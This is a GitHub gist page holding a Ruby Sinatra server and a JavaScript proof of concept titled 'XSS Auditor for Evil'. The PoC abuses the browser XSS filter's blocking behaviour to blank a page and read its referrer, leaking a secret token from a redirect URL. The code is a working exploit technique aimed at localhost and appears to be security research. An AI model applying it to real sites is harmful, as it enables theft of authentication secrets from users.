Create a gist now

Instantly share code, notes, and snippets.

Embed
XSS Auditor for Evil
require 'sinatra'
require 'securerandom'
=begin
Execute the following JavaScript on any domain, you can use web
inspector console.
Set noblock to remove mode=block and see <form> action=about:blank
case(requires user interaction)
var block = false;
if(block){
var cut_me = encodeURIComponent('<script
src="http://localhost:4567/some.js"></script>');
}else{
var cut_me = encodeURIComponent('<form action="/asdf">');
}
var playground = window.open(
'http://127.0.0.1:4567/auth?'+(block?'':'noblock=1&')+'state='+cut_me,
'n','height=1,width=1');
var int = setInterval(function(){
if(playground.document){
//it's about:blank now!
alert('Leaked: '+playground.document.referrer);
playground.close();
clearInterval(int);
}
}, 100);
=end
get '/auth' do
redirect "/#{'noblock' if
params[:noblock]}?secret=#{SecureRandom.hex(10)}&state=#{params[:state]}"
end
get '/' do
#sinatra sends X-XSS-Protection:1; mode=block by default
return r=<<HTML
<html>
<head>
<script src="http://localhost:4567/some.js"></script>
</head>
</html>
HTML
end
get '/noblock' do
headers['X-XSS-Protection'] = '1;' #no block mode
return r=<<HTML
<html>
<head>
<script src="http://localhost:4567/some.js"></script>
</head>
<body>
<form action="/asdf">
<input type="submit" value="CLICK ME! NOW!">
<input name="one" value="two">
</form>
<a href="javascript:omg(0)">link</a>
</body>
</html>
HTML
end
get '/some.js' do
'console.log("swaaag")'
end
@homakov

This comment has been minimized.

Show comment
Hide comment
@homakov

homakov Feb 7, 2013

fsdfsdf

Owner

homakov commented Feb 7, 2013

fsdfsdf

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment